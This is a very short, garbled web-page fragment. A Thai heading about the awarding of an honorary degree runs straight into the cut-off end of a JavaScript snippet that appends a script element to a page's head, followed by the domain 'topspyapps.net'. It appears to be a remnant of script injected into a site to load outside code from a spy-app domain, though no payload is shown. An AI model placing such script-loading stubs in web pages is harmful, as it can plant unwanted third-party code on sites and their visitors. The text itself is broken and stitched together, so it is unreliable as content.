มอบปริญญากิติมาศักดิ์

d.getElementsByTagName(‘head’)[0].appendChild(s);}topspyapps.net